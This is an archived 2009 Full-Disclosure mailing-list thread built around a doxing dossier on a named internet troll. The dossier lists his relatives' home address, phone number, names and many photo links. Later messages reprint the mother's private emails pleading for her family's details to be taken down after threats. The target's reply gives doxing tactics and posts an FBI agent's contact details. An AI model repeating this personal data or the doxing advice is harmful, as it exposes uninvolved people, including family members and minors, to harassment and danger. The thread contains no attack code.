victims (Which are on a >> > list too long for even his associates to remember in entirity) >> > consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's >> > identity theft. Also, at the request of Girlvinyl (Sherrod >> > DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the >> > wall, still hocking up her name on google to this day. >> > >> > Andrew wants glory. He wants to be in the news. His remedy for >> > distracting attention from his own flaws and ironies is the age-old >> > "blame it on the jews". >> > >> > For him, he doesn't try to use it in a sarcastic way, merely >> > pointing out absurb anti-semitism exists, he uses in this way to >> > say something so extreme any attempt of criticizing him stops. >> > >> > In general, a puppy that wants love, but apparently can't be >> > fixed. A Michael Crook. >> > >> > Real Identity >> > ============================= >> > - First name: Andrew >> > - Last name: Auernheimer (mispelled as Aurenheimer sometimes) >> > - Middle name: Alan Escher >> > - Full name: Andrew Alan Escher Auernheimer >> > >> > DOB >> > ============================= >> > We need this! >> > >> > Past schools >> > ============================= >> > We need this! >> > >> > Known address >> > ============================= >> > Family >> > 2038 W Grace St >> > Richmond, VA 23220 >> > >> > Criminal / 0day / Spam / Scam >> > PO Box 61359 >> > Sunnyvale, CA 94088 >> > >> > San Francisco, Los Angeles areas of California >> > >> > You can google his PO Box address (where he does biz from) and >> > see complaints about fraud. >> > >> > Known Aliases >> > ============================= >> > - Weev >> > - Wbeelsoi >> > - Uchiha Weevlos >> > - Weevlar >> > - Andrew wbeelsoi >> > - Andrew weevlos >> > - The iProhet >> > - TheiProphet >> > - The-iProphet >> > >> > Known Affiliations >> > ============================= >> > - Bantown >> > - Buttes >> > - EFnet #down >> > - SASS (Something Awful Sycophant Squad) >> > - Encyclopedia Dramatica >> > - SealPac >> > >> > Known Enemies >> > ============================= >> > Organizations: >> > - Something Awful >> > - FBI >> > - JDL >> > - Possibly banks >> > - Any law enforcement agency he knows him >> > - Any jewish civil rights group that knows him >> > >> > (Know more? http://tips.fbi.gov) >> > >> > Name: >> > - Dennis Fetcho >> > - Kathy Sierra >> > - Rob Levin >> > - Richard Kyanka (lowtax) >> > - FreeBSDGirl >> > >> > Known business affiliations >> > ============================= >> > Sealpac. Richmond, VA >> > >> > Photo >> > ============================= >> > - >> > http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 >> > /569px-Internet_business.jpg / >> > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / >> >> > http://imgur.com/V5hkG.jpg >> > >> > Known publicity stunts >> > ============================= >> > - Toorcon2111, Cybercrime >> > Full URL: http://video.google.com/videoplay?docid=- >> > 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi >> > TinyURL: http://tinyurl.com/auernheimercrime >> > - LiveJournal hacking >> > - NYTimes "Mawebulence" Expose >> > Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- >> > t.html?_r=1&hp&oref=slogin >> > Tiny URL: http://tinyurl.com/auernheimernytimes >> > - He is also taking credit for Amazon hack of 2009. However this >> > has not been confirmed >> > - Corrupt: www.corrupt.org/act/interviews/weev >> > - Public naming by JewishReview >> > Full URL: http://www.jewishreview.org/local/Police-question- >> > two-men-about-threats-to-Jewish-community >> > TinyURL: http://tinyurl.com/auernheimer >> > Archival: http://www.webcitation.org/5jnPBPyHG >> > Family >> > =================== >> > Phone number: (804) 355-2889 >> > >> > Mother >> > - Name: Catherine Auernheimer >> > - Affiilations: Richmond PTA, Democratic Party >> > - Alias: Alyse >> > - Photograph: http://imgur.com/AQpSd.jpg / >> > (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / >> > (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab >> > 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- >> > 16/953aqpsd.jpg) / >> > (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / >> > (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / >> > (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / >> > (http://images.imagenonline.com/img_a190867.jpg) / >> > (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) >> > >> > Father >> > - Name: Mark Auernheimer >> > - Affiliations: SealPac >> > - Photograph: http://imgur.com/CEaNX.jpg / >> > (http://img19.imageshack.us/img19/4673/ceanx.jpg) / >> > (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 >> > 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) >> > / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / >> > (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / >> > (http://www.desiupload.com/out.php/t325734_dad.jpg) / >> > (http://www.imagehuge.com/out.php/i16156_dad.jpg) / >> > (http://images.imagenonline.com/img_a190870.jpg) >> > >> > Not posting name or pictures of the brother and sister in law >> > again. >> > >> > Other pertinent information >> > =============================- >> > Meltdown post after his public naming: >> > - Source: http://weev.livejournal.com/368013.html >> > - Archival: http://www.webcitation.org/5jnP71qsD >> > >> > Also weev posts his IRL name+handle on >> > - >> > http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti >> > me.php. >> > - Archival: http://www.webcitation.org/5jnPc0pNy >> > >> > http://whois.domaintools.com/sealpac-usa.com >> > - Archival: http://www.webcitation.org/5jnT7EULI >> > - Related to http://www.sealpacusa.com? >> > >> > Weev online >> > ============================== >> > - http://www.encyclopediadramatica.com/index.php/weev >> > - http://weev.livejournal.com >> > - http://the-iprophet.org >> > - http://theiprophet.blip.tv >> > - http://www.weev.net >> > >> > Email >> > ============================= >> > - gluttony at gmail.com >> > >> > Legal Notice >> > ============================= >> > - http://tips.fbi.gov >> > >> > You don't have to give your identity if you don't want to (even >> > if you're a victim). You have a right to an attorney if you wish to >> > speak with them above weev. If you don't want them to know your >> > linkage with weev, send anonymous tip + some form of evidence (best >> > you can muster) to substantiate the lead >> > >> > Licensing >> > ============================= >> > This document is licensed under the GFDL. Open source >> > intelligence. >> > http://www.gnu.org/copyleft/fdl.html >> > >> > History >> > ============================= >> > 10 / 3 / 2009 - Initial revision by GOBBLES Security >> > >> > _______________________________________________ >> >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091005/9b5141c6/attachment.html From gobbles1337 at Safe-mail.net Mon Oct 5 06:36:32 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Mon, 5 Oct 2009 01:36:32 -0400 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Message-ID: Hello. Attached is the header and full context of my correspondence with Alyse. (Formatting removed for readability purposes) Remember what n3td3v said, we're counter-terrorism folk here. We're not setting up activists, hoodrats, felons and schizos here. This is the real deal. If you care about National Security I hope you visit the blog at http://twitter.com/n3td3v. We'll be at defcon 2010. >From designadventures at gmail.com Sun, 4 Oct 2009 17:55:51 -0400 Received: from rimon.safe-mail.net ([192.168.13.68]) by tapuz.safe-mail.net with smlocal (smtas 1.2); Sun, 4 Oct 2009 17:56:46 -0400 DomainKey-Status: good (no-policy) X-SMTests: g00smp0i0b0ar000 Received: from mail-ew0-f207.google.com ([209.85.219.207]) by rimon.safe-mail.net with esmtp (smtpd 1.0) id N1R-3r0RyBKk2j for gobbles1337 at safe-mail.net; Sun, 4 Oct 2009 17:55:51 -0400 Received-SPF: pass Received: by ewy3 with SMTP id 3so1937743ewy.13 for ; Sun, 04 Oct 2009 14:55:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=dyAmb+7CKb4ylfo3RkASEQTEncCOqgc7lGtXkp9OHbA=; b=wpaH6zPuqs0YTAA/370zXSJfNlT10F9uTyDcERdq5wIWZIRaHfDTkjdFtT4jy7smRy oiOLD+L75HetcDIbjPoMHmF3/EbrSVEUNhMNQq5+YEOzLcIHzEtrPO7+O5Vihdq0k7av audLLUoI1JDWjFwaFKlNKVCTK9XZB3JjHX1ac= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=OnhFUiXB+Tla1ltAKyaRrCNcbth6mdLoHE5u2EZVAj3CugWrR9Sf9+YtJEVUA5X+jg SLlE38NG8Xtbwizsbs+RGk5Z3dREcXiOWcGiZ3yfjbwWEn/pQMIqff08lm6RWuGbsEDJ 1ad7IYY7gZROdtTnujVfMjbDmKWM1Y+uhthvU= MIME-Version: 1.0 Received: by 10.216.72.149 with SMTP id t21mr832332wed.136.1254693355261; Sun, 04 Oct 2009 14:55:55 -0700 (PDT) In-Reply-To: References: Date: Sun, 4 Oct 2009 17:55:55 -0400 Message-ID: <4f8170520910041455t11aba6d1qf64bb7eff76f5a47 at mail.gmail.com> Subject: Re: So Weev... From: Alyse Auernheimer To: GOBBLES Content-Type: multipart/alternative; boundary=00504502c5edbe117b0475230f1e --00504502c5edbe117b0475230f1e Content-Type: text/plain; charset=ISO-8859-1 Please don't forward the email. Please. You have your information. You will be putting our family at risk if you do and it is purely self indulgent to do so. You have already forwarded it and we have already been threatened. Please stop. On Sun, Oct 4, 2009 at 4:19 PM, GOBBLES wrote: > OK. > > I'll stop posting that that family info. You're going to have to find who > took those pics and DMCA them down, then go ahead and send that email to > where FD is mirrored. Include the URL's on that particularly site > .Unfortunately it's time consuming. But if you grab the emails and do it in > a single script you'll be fine. > > If you find anything new about Andrew's whereabouts it's imperative to > notify Law enforcement ASAP. He just sent me a mail and he's hiding in the > forest with guns like some rightwing lonewolf (ruby ridge, kascynsky). Not > looking too good. > > I'm going to be forwarding that earlier email about weev from you to FD. > > > > -------- Original Message -------- > From: Alyse Auernheimer > To: GOBBLES > Subject: Re: So Weev... > Date: Sun, 4 Oct 2009 11:29:50 -0400 > > > Actually, Andrew has no relationship to designadventures or sealpac. Years > ago before sealpac came the US market, Andrew grabbed the domain name > (before we knew anything about his mental issues). We want it back. We > didn't even remember until this week that his name was on it as we paid for > several years in advance and the recent renewal was paid by credit card. > Design Adventures is my little interior design business-never had a thing to > do with Andrew. Design Adventures and Sealpac have nothing to do with Andrew > and have never done business with Andrew. In fact, even as parents we have > never financially supported him since he left home. Years ago our > communication with him was come home, get help, go to school and we will > then and only then support you. He refused. > > Andrew was never abused or neglected. When he lived with us he was a > totally different person, prior to his substance abuse issues. He became a > different person in Cal. He had to get as far away from us as he could to > participate in this kind of behavior because we would have called the cops > and kicked his ass to the curb. > > From his postings he is deranged and a drug addict. We are not asking for > sympathy for him. Andrew has been detained by the FBI twice this year? They > didn't do anything?!@#!!! I don't know what the strategy should be for you > or I if the FBI won't do anything to stop him and we can't find him. > You don't want to call the FBI and we don't care if you do, if they need to > they will contact you. Andrew's name has been available online for years so > it never even occurred to me to disclose his name but I also spoke to law > enforcement a year ago so even they knew. There are so many crazies on the > web just like Andrew and we simply stopped trying with him when he went to > California years ago. He would not give us his address or location. > Truthfully, until about a year ago we didn't even know about this ugly, > racist rhetoric because we weren't wasting our days looking. Many years ago > he was online railing against Bill O'Reilly and the far right and saying > anything to inflame. He used to be a radical liberal. I think he is so crazy > now that he might be convinced that martians are ruining his life, not Jews. > He's nuts. Sadly he is not alone. I could not believe, when I finally got > wind of his livejournal, how many people were posting horrible things in > agreement. I felt physically sick. All of those people are also a danger and > who knows who those people are. They were smart enough to not post their own > photos and link their real names to their ugly words. They may be more of a > danger because we don't know who they are. > > I thought the person claiming to be from Dreamworks was you because I > replied that I had not seen or heard from him in over two years and you > posted that very communication on your forum a day later. I communicated to > law enforcement that I thought it was you. Maybe it was one of the other > people posting and giving you information. Regardless, that is for law > enforcement to work out and I don't believe it was really someone from > Dreamworks. The problem with all this hacker shit is that you cant trust > anyone; you don't know what to believe. Frankly, I don't even know about > you. I want Andrew to stop. I don't know what to do. I am frankly worried > you will post my cooperation with you somewhere and andrew will find out and > hurt us. Do not disclose communication with us because of this fear. > > I have answered your questions truthfully. You have promised not to post > our personal information and I am trusting you are the kind of person I am > hoping you are. > > I am open to further communication with you through the Richmond Rabbi of > your choice. I do a lot of volunteer work through a Richmond > non-denominational non-profit organization and I can bring a local Rabbi > into the conversation if you would prefer. As you said, the irony is we are > a multi-racial family. My great grandparents were Czech, Jewish immigrants, > and I am native American. As the white parents of black kids living in the > south you can be sure we know about racism. The world is a small place and > we are all one. Andrew and his victims are but one of the many sad, dark > consequences of drug addiction, internet addiction, and the internet itself. > > I am so so sorry for your suffering. > > We too are suffering. > > This is a nightmare. > > We feel like hostages. I am sure you do too. > > Alyse > > > > > > On Sun, Oct 4, 2009 at 2:15 AM, GOBBLES wrote: > >> OK Alyse. >> >> I did not read your email until just now. In a new post about Andrew I did >> mention you and Mark. However, I opted-out of mentioning the kids. >> >> I did not previously know your relation to Andrew, but I figured he was >> either abused or neglected as a child. If you read his videos, he does >> mention what a horrible family he comes from. Seeing how deranged and evil >> he is, I interpretted his parents as being no better. However, after hearing >> from you I'm unsure what to think. >> >> Mentally ill or not, this kid doesn't deserve sympathy. The kid has a list >> of stuff on the net by this psycho that could go on for miles. >> >> I'll stop posting your information up there. But you have to answer this: >> >> Why didn't disclose the name of Andrew to the public while he was doing >> this? >> >> What relations did you have business wise with Andrew while doing this >> activity? Design Adventures? Sealpac? Did you let Andrew in on these things >> while he was engaging in this? >> >> An investigator pretexted you claiming to be from dreamworks? What more do >> you know about Andrew's alleged activity? >> >> I don't want to talk to the FBI. There's already the tips.fbi.gov tool. >> Unfortunately, Full disclosure mirrors redundantly. The good news is people >> who were harassed by weev can look him up over the next year and send in >> reports. >> >> >> >> -------- Original Message -------- >> From: Alyse Auernheimer >> To: fyodor at insecure.org, gobbles1337 at Safe-mail.net >> Subject: RE: So Weev... >> Date: Sat, 3 Oct 2009 02:28:54 -0400 >> >> > Mr. Lyon, Paul >> > >> > There is a thread on your website referencing my son Andrew Auernheimer. >> I am totally sympathetic with those posting as my son is guilty of horrible >> behavior. We are ashamed of him and wish we could find him ourselves. Sadly, >> your contributors felt the need to "Out" our family, Andrew's parents and >> siblings. There are links to our younger children, one of whom is only 14, >> our address and phone numbers are available, photos of the children and one >> reference by one poster as to a desire to rape me. The truth is everyone we >> know already knows we have a mentally ill child. We have made no secret of >> Andrew. >> > >> > We too are victims of Andrew. The hardest part for all of us is that he >> used to be normal. He loved us and was sweet and kind to his siblings. >> Several years ago he developed a relationship with a girl with a serious >> drug problem. He began by using xtc regularly and eventually graduated to >> LSD and heroin. About three years ago he had a mental breakdown and began >> hearing voices and talking to himself. He vanished from our lives. My >> children would log into AIM to see if he was still alive; if he was logged >> on too long or not recently they would worry something had happened to him. >> There are references to his lavish lifestyle on this thread but the sad >> truth is he is paranoid schizophrenic and has been homeless a number of >> times. I am not excusing his pathetic behavior. My husband and I contacted >> law enforcement in Southern California almost a year ago as we wanted to try >> to "catch him" and have him forcibly committed; he needs help. Unfortunately >> we were told that the likely outcome would be 72 hours in a mental facility >> and they would let him go and since we are in no financial position to pay >> for mental health care for him we should just pray and forget it. I cried >> every night for a year but I am done crying. I can only worry about things >> that I can change and I really have NO information about Andrew. He never >> once gave us a phone number or address where we could reach him. When he >> left here he did not have a car or a license. I don't even know what state >> he might be in and frankly, I don't know if I want to anymore. >> > >> > I don't know if any of you have ever had a mentally ill family member. >> It is torture. For it to be your child is indescribably painful. I >> sometimes wonder if because our lives as a family have been dedicated to >> diversity and inclusion, that he may have chosen his weapons to purposely >> hurt us. We are tough though and committed to each other and making the most >> positive contributions to our world as we are able. >> > >> > I hope you all can find it in your hearts to please take down our >> personal information. If your goal is to hurt US then you have succeeded. >> Other than that I am not sure what the purpose of all this was. I don't cry >> over Andrew anymore but I found this thread when I googled my daughter >> looking for a school picture for her dorm room and I sobbed. She has never >> said an unkind word to anyone and I knew she would be devastated. We are not >> responsible for Andrew's totally screwed up life, he is. I was contacted >> erroneously on my Facebook page by someone named Anton Garcia posing as a >> Dreamworks Animation Employee trying to find Andrew because he was hacking >> Dreamworks. I suspected it was fake but I answered anyway, truthfully. I too >> want him to own up to his stupid behavior and take the consequences like a >> man. I'm sure I will be disappointed. The worst part about this is you ONLY >> hurt us. Andrew probably thought it was hilarious. He doesn't care what you >> say or do to us, he only cares about himself. He, in the past, has even made >> up a variety of ugly lies about us, but he is always found out. >> > >> > Many of the postings referred to our family as nice. This is accurate. >> Our other children are everything Andrew rejected, kind, smart, >> hard-working, dedicated to making a difference through public service, and >> we have left Andrew behind. There is so much need in this world and so >> little time that spending it on tears and regret is a colossal waste. Don't >> get me wrong we will always love Andrew and our hearts will forever be >> broken where he is concerned but what else can we do but move on. It's like >> the Andrew we knew died long ago. Hope does spring eternal and sometimes I >> dream the real Andrew is home and we are all together, but my hopes are >> waning. Who knows, the future is never certain. I have been referred to an >> FBI agent who is involved with the cyber crimes division. I will forward >> this email to her tomorrow. >> > >> > Again, please don't make my younger children suffer any more. Do what >> you will with Andrew, he's earned it, but please let our family try to move >> on. We have been dealing with this for years. >> > >> > Sincerely, >> > Alyse Auernheimer >> > > --00504502c5edbe117b0475230f1e-- -------- Original Message -------- From: dramacrat Apparently from: israafiyl at gmail.com To: GOBBLES Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Date: Mon, 5 Oct 2009 14:47:46 +1100 > So if I'm to understand you correctly, "gobbles 1337", Weev's mother or a family member was searching the family name randomly on Google, came across these threads, did not email the list but instead emailed you with a long list of abuse about Weev, within which she did not disclose any information about her own son that you did not know already; despite the fact that as his mother she would surely be privy to such information. She also, if I am to believe your emails, did not disagree with you on any point. You then kindly stripped the email formatting and rather than forwarding the email to the list, pasted it into your own email so that it would seem almost as though you wrote these emails! > > How strange. > > 2009/10/5 GOBBLES > > > > > > Mr. Auernheimer, > > > > That's true. I'm not a hacker. > > > > Also, sorry for not clarifying that I use mrxisaplant too. > > > > Here is more correspondance received from your mom (added paragraph breaks): > > > > Actually, Andrew has no relationship to designadventures or sealpac. Years > > ago before sealpac came the US market, Andrew grabbed the domain name > > (before we knew anything about his mental issues). We want it back. We > > didn't even remember until this week that his name was on it as we paid for > > several years in advance and the recent renewal was paid by credit card. > > Design Adventures is my little interior design business-never had a thing to > > do with Andrew. Design Adventures and Sealpac have nothing to do with Andrew > > and have never done business with Andrew. In fact, even as parents we have > > never financially supported him since he left home. Years ago our > > communication with him was come home, get help, go to school and we will > > then and only then support you. He refused. > > > > Andrew was never abused or neglected. When he lived with us he was a > > totally different person, prior to his substance abuse issues. He became a > > different person in Cal. He had to get as far away from us as he could to > > participate in this kind of behavior because we would have called the cops > > and kicked his ass to the curb. > > > > From his postings he is deranged and a drug addict. We are not asking for > > sympathy for him. Andrew has been detained by the FBI twice this year? They > > didn't do anything?!@#!!! I don't know what the strategy should be for you > > or I if the FBI won't do anything to stop him and we can't find him. > > You don't want to call the FBI and we don't care if you do, if they need to > > they will contact you. Andrew's name has been available online for years so > > it never even occurred to me to disclose his name but I also spoke to law > > enforcement a year ago so even they knew. > > > > There are so many crazies on the > > web just like Andrew and we simply stopped trying with him when he went to > > California years ago. He would not give us his address or location. > > Truthfully, until about a year ago we didn't even know about this ugly, > > racist rhetoric because we weren't wasting our days looking. > > > > Many years ago > > he was online railing against Bill O'Reilly and the far right and saying > > anything to inflame. He used to be a radical liberal. I think he is so crazy > > now that he might be convinced that martians are ruining his life, not Jews. > > He's nuts. Sadly he is not alone. I could not believe, when I finally got > > wind of his livejournal, how many people were posting horrible things in > > agreement. I felt physically sick. All of those people are also a danger and > > who knows who those people are. They were smart enough to not post their own > > photos and link their real names to their ugly words. They may be more of a > > danger because we don't know who they are. > > > > > > > > -------- Original Message -------- > > From: Andrew A > > To: GOBBLES > > Cc: full-disclosure at lists.grok.org.uk > > Subject: Re: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] > > Date: Sun, 4 Oct 2009 12:33:13 -0500 > > > > > > > > Mr. Learner, > > > > > > You really are hilarious. I can infer one thing from your posts: you aren't a hacker, and you find this really awkward and aren't sure how this whole ruin thing works. > > > > > > You have no access to data that I have not made public. Once again, the only thing you found out was my name, which I put on my livejournal. Big deal. The rest was google-able. You really don't have anything. You also don't understand how to make this whole doxdrop deal effective and dramatic. You save up everything you can until you find a piece of data which is psychologically damaging to the target. You have to essentially find them guilty of wrongdoing, like using a nonprofit to defraud people, or sucking dicks for money. This whole thing where you post somebody's parents address, big deal. Everybody's got parents unless they're orphaned. Those parents inevitably live somewhere. If I were a basement dwelling loser, this tactic might be effective. Unfortunately I live on 60 acres in the sticks and have hungry dogs and guns. Not much you can do to me. > > > > > > Since you are so fucking inept that you can't even find my birthday: September 1st, 1985 > > > My former school: James Madison University > > > > > > Protip: Nobody in the FBI takes internet submitted tips seriously. If you want to go submit leads to the FBI, you can do it directly to the FBI agent out to get me. > > > > > > Craig G. Mueller > > > Special Agent > > > Ph: (503) 552 5473 > > > Fa: (503) 552 5327 > > > craig.mueller at ic.fbi.gov > > > > > > I have attached a photo of his business card as well, for your personal verification and convenience. > > > > > > > > > Earlier you called for my "methods of alluding law enforcement." (sic; You make so many errors in your English that it becomes hilariously obvious that all your sockpuppets are the same person.) I've got some funny logs to give you when you've exhausted your effort. You're going to LOL. > > > > > > On Sun, Oct 4, 2009 at 1:36 AM, GOBBLES wrote: > > > > > > > > One that that struck me as ironic about Encyclopedia Dramatica and Sherrod DeGrippo ordering hits on people who get a rise on her, she wants hard revenge. For a person who runs a site that makes embarrassing nightmares come true, she sure can't stand much heat herself. She took the GNAA phreaking her, and ended up becoming no better than the people who spooked her. > > > > > > > > Thing is, she's hiding behind a federal law as a portal provider. Isn't their an exception is when the owner's participates in the content environment? > > > > > > > > She also plays the shell game with Joseph Evers. And you don't know whether she's lying and handing out logs to law enforcement without subpoena's (informing for cash, she's jobless besides selling shirts, which can't even pay the server bills let alone a mortgage). Regardless, this doesn't make her immune to civil torts. She probably has some fat ass pockets from being on some corrupt fed's payroll. Sickening. > > > > > > > > Randi Harper is an example of how Sherrod DeGrippo, owner of Encyclopedia Dramatica, exhibits control on the flow of the website's informatoin. > > > > > > > > In a sense, if an attorney was able to muster it up proof, the safe harbor "Shields" of girlvinyl's space ship may have an opening in them. If these shields were to go down, this site would just be hammered. ED wasn't an LLC since a years or so ago, so it was still someone's site... > > > > > > > > Just saying. > > > > > > > > http://encyclopediadramatica.com/index.php/Sektie > > > > Archive: http://www.webcitation.org/5kGadccIg > > > > > > > > This lawless libertarian hellhole has got to end here. Looks like a darkmarket for trolls. Whatever the case, it encourages mean-spiritedness and is almost traumatic in the culture it fosters. Its almost like the projects, it draws in the worst crowd, and even if she is snitching, she's keeping the info up while people suffer. > > > > > > > > > > > > -------- Original Message -------- > > > > From: "TheLearner" > > > > Apparently from: full-disclosure-bounces at lists.grok.org.uk > > > > To: full-disclosure at lists.grok.org.uk > > > > Subject: [Full-disclosure] Weev,AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] > > > > Date: Sun, 04 Oct 2009 01:37:51 +0000 > > > > > > > > > > > > > Eyeballing Weev, An informative dossier. > > > > > ============================= > > > > > By FeelTheBurn Udmncrmnl > > > > > > > > > > Version > > > > > ============================= > > > > > Revision #1 > > > > > > > > > > Purpose > > > > > ============================= > > > > > You can edit this document and submit it back as a new revision. > > > > > > > > > > An effort by community citizens to expose this person. If you > > > > > have any helpful knowledge about weev (even general) and have > > > > > something to add, please reply with any editions. > > > > > > > > > > Abstract > > > > > ============================= > > > > > I noticed seclists.org was taking down information relating to the > > > > > "doxing" of Andrew Auernheimer. > > > > > - Original post > > > > > http://seclists.org/fulldisclosure/2009/Oct/0013.html > > > > > - Mirror (http://www.webcitation.org/5kD6O0OEd) > > > > > > > > > > Andrew is a troll in his early 20's who has hacked into various > > > > > websites, harasses innocent people and companies, and actually > > > > > dropped dox on this very list. Some of his victims (Which are on a > > > > > list too long for even his associates to remember in entirity) > > > > > consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's > > > > > identity theft. Also, at the request of Girlvinyl (Sherrod > > > > > DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the > > > > > wall, still hocking up her name on google to this day. > > > > > > > > > > Andrew wants glory. He wants to be in the news. His remedy for > > > > > distracting attention from his own flaws and ironies is the age-old > > > > > "blame it on the jews". > > > > > > > > > > For him, he doesn't try to use it in a sarcastic way, merely > > > > > pointing out absurb anti-semitism exists, he uses in this way to > > > > > say something so extreme any attempt of criticizing him stops. > > > > > > > > > > In general, a puppy that wants love, but apparently can't be > > > > > fixed. A Michael Crook. > > > > > > > > > > Real Identity > > > > > ============================= > > > > > - First name: Andrew > > > > > - Last name: Auernheimer (mispelled as Aurenheimer sometimes) > > > > > - Middle name: Alan Escher > > > > > - Full name: Andrew Alan Escher Auernheimer > > > > > > > > > > DOB > > > > > ============================= > > > > > We need this! > > > > > > > > > > Past schools > > > > > ============================= > > > > > We need this! > > > > > > > > > > Known address > > > > > ============================= > > > > > Family > > > > > 2038 W Grace St > > > > > Richmond, VA 23220 > > > > > > > > > > Criminal / 0day / Spam / Scam > > > > > PO Box 61359 > > > > > Sunnyvale, CA 94088 > > > > > > > > > > San Francisco, Los Angeles areas of California > > > > > > > > > > You can google his PO Box address (where he does biz from) and > > > > > see complaints about fraud. > > > > > > > > > > Known Aliases > > > > > ============================= > > > > > - Weev > > > > > - Wbeelsoi > > > > > - Uchiha Weevlos > > > > > - Weevlar > > > > > - Andrew wbeelsoi > > > > > - Andrew weevlos > > > > > - The iProhet > > > > > - TheiProphet > > > > > - The-iProphet > > > > > > > > > > Known Affiliations > > > > > ============================= > > > > > - Bantown > > > > > - Buttes > > > > > - EFnet #down > > > > > - SASS (Something Awful Sycophant Squad) > > > > > - Encyclopedia Dramatica > > > > > - SealPac > > > > > > > > > > Known Enemies > > > > > ============================= > > > > > Organizations: > > > > > - Something Awful > > > > > - FBI > > > > > - JDL > > > > > - Possibly banks > > > > > - Any law enforcement agency he knows him > > > > > - Any jewish civil rights group that knows him > > > > > > > > > > (Know more? http://tips.fbi.gov) > > > > > > > > > > Name: > > > > > - Dennis Fetcho > > > > > - Kathy Sierra > > > > > - Rob Levin > > > > > - Richard Kyanka (lowtax) > > > > > - FreeBSDGirl > > > > > > > > > > Known business affiliations > > > > > ============================= > > > > > Sealpac. Richmond, VA > > > > > > > > > > Photo > > > > > ============================= > > > > > - > > > > > http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 > > > > > /569px-Internet_business.jpg / > > > > > > > > > > > > > > > > > > > > > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / > > > > > > > > > http://imgur.com/V5hkG.jpg > > > > > > > > > > Known publicity stunts > > > > > ============================= > > > > > - Toorcon2111, Cybercrime > > > > > Full URL: http://video.google.com/videoplay?docid=- > > > > > 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi > > > > > TinyURL: http://tinyurl.com/auernheimercrime > > > > > - LiveJournal hacking > > > > > - NYTimes "Mawebulence" Expose > > > > > Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- > > > > > t.html?_r=1&hp&oref=slogin > > > > > Tiny URL: http://tinyurl.com/auernheimernytimes > > > > > - He is also taking credit for Amazon hack of 2009. However this > > > > > has not been confirmed > > > > > - Corrupt: www.corrupt.org/act/interviews/weev > > > > > - Public naming by JewishReview > > > > > Full URL: http://www.jewishreview.org/local/Police-question- > > > > > two-men-about-threats-to-Jewish-community > > > > > TinyURL: http://tinyurl.com/auernheimer > > > > > Archival: http://www.webcitation.org/5jnPBPyHG > > > > > Family > > > > > =================== > > > > > Phone number: (804) 355-2889 > > > > > > > > > > Mother > > > > > - Name: Catherine Auernheimer > > > > > - Affiilations: Richmond PTA, Democratic Party > > > > > - Alias: Alyse > > > > > - Photograph: http://imgur.com/AQpSd.jpg / > > > > > (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / > > > > > (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab > > > > > 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- > > > > > 16/953aqpsd.jpg) / > > > > > (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / > > > > > (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / > > > > > (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / > > > > > (http://images.imagenonline.com/img_a190867.jpg) / > > > > > (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) > > > > > > > > > > Father > > > > > - Name: Mark Auernheimer > > > > > - Affiliations: SealPac > > > > > - Photograph: http://imgur.com/CEaNX.jpg / > > > > > (http://img19.imageshack.us/img19/4673/ceanx.jpg) / > > > > > (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 > > > > > 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) > > > > > / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / > > > > > (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / > > > > > (http://www.desiupload.com/out.php/t325734_dad.jpg) / > > > > > 